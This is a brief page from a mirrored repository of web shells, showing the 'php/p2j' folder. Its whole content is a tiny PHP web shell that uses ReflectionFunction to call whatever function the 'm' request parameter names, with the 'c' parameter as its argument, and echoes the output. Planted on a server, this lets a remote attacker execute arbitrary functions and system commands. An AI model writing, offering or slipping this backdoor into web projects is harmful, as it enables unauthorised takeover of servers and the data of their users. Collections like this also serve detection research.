1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-09 14:11:30 +00:00
Files
webshell/php/p2j
2014-07-28 10:03:18 +08:00
..
2014-07-28 09:47:51 +08:00
2014-07-28 10:03:18 +08:00

alt text

code:

<?php

$func = new ReflectionFunction($_GET[m]);

echo $func->invokeArgs(array($_GET[c]));

?>